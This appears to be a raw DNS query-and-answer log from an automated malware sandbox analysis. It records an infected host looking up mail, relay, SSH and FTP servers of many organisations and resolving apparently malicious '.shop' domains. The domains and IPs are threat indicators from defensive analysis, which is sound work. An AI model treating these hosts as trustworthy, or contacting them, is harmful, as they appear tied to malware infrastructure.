                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.420559883 CET192.168.2.61.1.1.10x284cStandard query (0)relay.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.421730995 CET192.168.2.61.1.1.10x589aStandard query (0)smtp.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.422904968 CET192.168.2.61.1.1.10x870cStandard query (0)relay.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.434345961 CET192.168.2.61.1.1.10xeed0Standard query (0)imap.transaccional.saludtotal.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.435446024 CET192.168.2.61.1.1.10x70ddStandard query (0)relay.account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.438077927 CET192.168.2.61.1.1.10xbae8Standard query (0)mail.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.443805933 CET192.168.2.61.1.1.10x63d6Standard query (0)mailgate.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.446270943 CET192.168.2.61.1.1.10xf49bStandard query (0)mailgate.analvids.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.446466923 CET192.168.2.61.1.1.10xcd1dStandard query (0)pop.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.461990118 CET192.168.2.61.1.1.10xb3dcStandard query (0)www.hero-wars.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.464070082 CET192.168.2.61.1.1.10x8e7cStandard query (0)imap.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.475303888 CET192.168.2.61.1.1.10xd12aStandard query (0)relay.vidcorn.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.557367086 CET192.168.2.61.1.1.10x8415Standard query (0)imap.s163-es.ogame.gameforge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.559813976 CET192.168.2.61.1.1.10xe4f4Standard query (0)imap.signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.561467886 CET192.168.2.61.1.1.10x3162Standard query (0)smtp.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.561620951 CET192.168.2.61.1.1.10xc4c5Standard query (0)relay.contribuyente.seniat.gob.veA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.562714100 CET192.168.2.61.1.1.10x6865Standard query (0)relay.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.573221922 CET192.168.2.61.1.1.10x8a62Standard query (0)imap.loopex.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.616229057 CET192.168.2.61.1.1.10x5dceStandard query (0)ssh.zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.627016068 CET192.168.2.61.1.1.10xd4bbStandard query (0)mailgate.m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.628314018 CET192.168.2.61.1.1.10x987cStandard query (0)imap.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.629371881 CET192.168.2.61.1.1.10x77f5Standard query (0)relay.mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.683039904 CET192.168.2.61.1.1.10xb6aeStandard query (0)pop.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.727118015 CET192.168.2.61.1.1.10xbe12Standard query (0)www.kwyk.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.731177092 CET192.168.2.61.1.1.10xaef9Standard query (0)ssh.gitam.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.763607025 CET192.168.2.61.1.1.10x870cStandard query (0)relay.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.763647079 CET192.168.2.61.1.1.10x8da9Standard query (0)mailgate.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.842365026 CET192.168.2.61.1.1.10xf650Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.842391968 CET192.168.2.61.1.1.10x49f9Standard query (0)m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.843630075 CET192.168.2.61.1.1.10xa127Standard query (0)mailgate.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.878983974 CET192.168.2.61.1.1.10xa2ffStandard query (0)pop3.mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.935889006 CET192.168.2.61.1.1.10xe549Standard query (0)pop3.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.941828966 CET192.168.2.61.1.1.10xa82aStandard query (0)relay.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.960820913 CET192.168.2.61.1.1.10xd4bbStandard query (0)mailgate.m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.960839987 CET192.168.2.61.1.1.10x5dceStandard query (0)ssh.zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.970211983 CET192.168.2.61.1.1.10xb289Standard query (0)mailgate.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.973253965 CET192.168.2.61.1.1.10xed7bStandard query (0)relay.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.996809006 CET192.168.2.61.1.1.10x44faStandard query (0)relay.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.000688076 CET192.168.2.61.1.1.10x4b5dStandard query (0)mail.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.001904011 CET192.168.2.61.1.1.10xdad4Standard query (0)imap.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.004074097 CET192.168.2.61.1.1.10xf8e2Standard query (0)mailgate.transaccional.saludtotal.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.004822016 CET192.168.2.61.1.1.10xeedStandard query (0)relay.midetuvelocidad.claro.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.027905941 CET192.168.2.61.1.1.10x52c0Standard query (0)pop3.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.028069973 CET192.168.2.61.1.1.10x24a3Standard query (0)relay.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.035620928 CET192.168.2.61.1.1.10x3b03Standard query (0)smtp.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.064187050 CET192.168.2.61.1.1.10xa272Standard query (0)smtp.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.065747023 CET192.168.2.61.1.1.10x708cStandard query (0)mailgate.s163-es.ogame.gameforge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.086647987 CET192.168.2.61.1.1.10x1887Standard query (0)mailgate.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.087848902 CET192.168.2.61.1.1.10x3375Standard query (0)relay.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.091247082 CET192.168.2.61.1.1.10x1aaeStandard query (0)mailgate.loopex.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.116678953 CET192.168.2.61.1.1.10x51b0Standard query (0)mailgate.signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.134588003 CET192.168.2.61.1.1.10x660fStandard query (0)relay.analvids.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.149471045 CET192.168.2.61.1.1.10xc250Standard query (0)mailgate.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.150410891 CET192.168.2.61.1.1.10x9de2Standard query (0)smtp.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.150614977 CET192.168.2.61.1.1.10x313aStandard query (0)smtp.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.167803049 CET192.168.2.61.1.1.10x97fbStandard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.181499958 CET192.168.2.61.1.1.10x57b7Standard query (0)relay.m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.208873034 CET192.168.2.61.1.1.10x99feStandard query (0)mailgate.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.208929062 CET192.168.2.61.1.1.10xa2ffStandard query (0)pop3.mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.232422113 CET192.168.2.61.1.1.10x7acfStandard query (0)relay.transaccional.saludtotal.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.271338940 CET192.168.2.61.1.1.10xa82aStandard query (0)relay.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.278271914 CET192.168.2.61.1.1.10xff73Standard query (0)relay.s163-es.ogame.gameforge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.295846939 CET192.168.2.61.1.1.10xac8bStandard query (0)ssh.milogin.michigan.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.296016932 CET192.168.2.61.1.1.10x67edStandard query (0)ssh.contribuyente.seniat.gob.veA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.307557106 CET192.168.2.61.1.1.10x34b5Standard query (0)relay.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.312743902 CET192.168.2.61.1.1.10xb289Standard query (0)mailgate.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.313101053 CET192.168.2.61.1.1.10x67f6Standard query (0)ssh.steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.326643944 CET192.168.2.61.1.1.10x6992Standard query (0)relay.loopex.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.339869976 CET192.168.2.61.1.1.10xead0Standard query (0)mailgate.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.340516090 CET192.168.2.61.1.1.10x16c5Standard query (0)relay.signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.368252993 CET192.168.2.61.1.1.10x24a3Standard query (0)relay.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.368269920 CET192.168.2.61.1.1.10x52c0Standard query (0)pop3.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.400825977 CET192.168.2.61.1.1.10x2d6Standard query (0)smtp.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.412684917 CET192.168.2.61.1.1.10xc2fcStandard query (0)mail.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.441874981 CET192.168.2.61.1.1.10xb6e4Standard query (0)relay.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.506310940 CET192.168.2.61.1.1.10x5124Standard query (0)relay.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.520062923 CET192.168.2.61.1.1.10x2ee2Standard query (0)mailgate.mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.523531914 CET192.168.2.61.1.1.10x57b7Standard query (0)relay.m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.848968029 CET192.168.2.61.1.1.10x2ee2Standard query (0)mailgate.mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.848992109 CET192.168.2.61.1.1.10x5124Standard query (0)relay.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.271219015 CET192.168.2.61.1.1.10xa82aStandard query (0)relay.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:09.833784103 CET192.168.2.61.1.1.10xf650Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.165730953 CET192.168.2.61.1.1.10x9361Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.173990965 CET192.168.2.61.1.1.10xfe27Standard query (0)www.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.336186886 CET192.168.2.61.1.1.10x9d04Standard query (0)m.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.143094063 CET192.168.2.61.1.1.10x622cStandard query (0)lookaside.fbsbx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.153538942 CET192.168.2.61.1.1.10x688bStandard query (0)ftp.oferta.senasofiaplus.edu.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.432940006 CET192.168.2.61.1.1.10x7dd8Standard query (0)mail.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.436675072 CET192.168.2.61.1.1.10x76e6Standard query (0)ssh.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.439007044 CET192.168.2.61.1.1.10x5676Standard query (0)ftp.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.457560062 CET192.168.2.61.1.1.10xb3e1Standard query (0)imap.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.468782902 CET192.168.2.61.1.1.10x4ca8Standard query (0)relay.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.187855005 CET192.168.2.61.1.1.10x7dd8Standard query (0)mail.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.187891006 CET192.168.2.61.1.1.10x5676Standard query (0)ftp.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.187901974 CET192.168.2.61.1.1.10x76e6Standard query (0)ssh.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.187958002 CET192.168.2.61.1.1.10xb3e1Standard query (0)imap.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.298222065 CET192.168.2.61.1.1.10x1f37Standard query (0)store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.300386906 CET192.168.2.61.1.1.10x7dc0Standard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.545881987 CET192.168.2.61.1.1.10x5557Standard query (0)relay.mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.549000978 CET192.168.2.61.1.1.10x9f68Standard query (0)mail.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.565823078 CET192.168.2.61.1.1.10xfbdbStandard query (0)relay.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.569577932 CET192.168.2.61.1.1.10x7ebdStandard query (0)relay.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.570240974 CET192.168.2.61.1.1.10xc17aStandard query (0)mailgate.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.570475101 CET192.168.2.61.1.1.10x6190Standard query (0)relay.sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.631781101 CET192.168.2.61.1.1.10x7dc0Standard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.646624088 CET192.168.2.61.1.1.10xc784Standard query (0)mailgate.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.903309107 CET192.168.2.61.1.1.10x5557Standard query (0)relay.mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.922777891 CET192.168.2.61.1.1.10x510dStandard query (0)ww12.chainmine.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.941092014 CET192.168.2.61.1.1.10x3029Standard query (0)relay.app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.945837975 CET192.168.2.61.1.1.10x13d9Standard query (0)smtp.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.950241089 CET192.168.2.61.1.1.10x283aStandard query (0)relay.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.223747015 CET192.168.2.61.1.1.10x76e6Standard query (0)ssh.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.223774910 CET192.168.2.61.1.1.10x5676Standard query (0)ftp.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.223774910 CET192.168.2.61.1.1.10x7dd8Standard query (0)mail.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.241046906 CET192.168.2.61.1.1.10x8c45Standard query (0)ftp.chainmine.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.241194010 CET192.168.2.61.1.1.10x189dStandard query (0)mailgate.student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.258578062 CET192.168.2.61.1.1.10x510dStandard query (0)ww12.chainmine.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.260979891 CET192.168.2.61.1.1.10x7f43Standard query (0)mailgate.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.361227036 CET192.168.2.61.1.1.10x717Standard query (0)ftp.srienlinea.sri.gob.ecA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.699263096 CET192.168.2.61.1.1.10x4d0Standard query (0)ftp.mw.redsa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:14.040934086 CET192.168.2.61.1.1.10x4d0Standard query (0)ftp.mw.redsa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:15.224700928 CET192.168.2.61.1.1.10x7dd8Standard query (0)mail.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:15.224736929 CET192.168.2.61.1.1.10x76e6Standard query (0)ssh.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:15.224736929 CET192.168.2.61.1.1.10x5676Standard query (0)ftp.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.271332026 CET192.168.2.61.1.1.10x5676Standard query (0)ftp.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.271363974 CET192.168.2.61.1.1.10x7dd8Standard query (0)mail.sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:17.637717962 CET1.1.1.1192.168.2.60xcac4No error (0)selebration17io.io91.215.85.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:23.898818970 CET1.1.1.1192.168.2.60x8059No error (0)resergvearyinitiani.shop172.67.217.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:23.898818970 CET1.1.1.1192.168.2.60x8059No error (0)resergvearyinitiani.shop104.21.94.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.111125946 CET1.1.1.1192.168.2.60x5c60No error (0)gemcreedarticulateod.shop172.67.152.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.111125946 CET1.1.1.1192.168.2.60x5c60No error (0)gemcreedarticulateod.shop104.21.80.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.338534117 CET1.1.1.1192.168.2.60x117cNo error (0)real.avalmag.com172.67.213.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.338534117 CET1.1.1.1192.168.2.60x117cNo error (0)real.avalmag.com104.21.67.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:28.305560112 CET1.1.1.1192.168.2.60xdb3No error (0)secretionsuitcasenioise.shop104.21.16.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:28.305560112 CET1.1.1.1192.168.2.60xdb3No error (0)secretionsuitcasenioise.shop172.67.213.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:29.677287102 CET1.1.1.1192.168.2.60xed3dNo error (0)claimconcessionrebe.shop172.67.199.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:29.677287102 CET1.1.1.1192.168.2.60xed3dNo error (0)claimconcessionrebe.shop104.21.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:30.920813084 CET1.1.1.1192.168.2.60xcb98No error (0)liabilityarrangemenyit.shop104.21.83.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:30.920813084 CET1.1.1.1192.168.2.60xcb98No error (0)liabilityarrangemenyit.shop172.67.182.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117748022 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117748022 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117748022 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117748022 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com151.233.51.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117748022 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com93.112.195.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117748022 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com185.12.79.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117748022 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com138.36.3.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117748022 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117748022 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117748022 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117784023 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117784023 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com123.140.161.243A (IP address)IN (0x0001)false
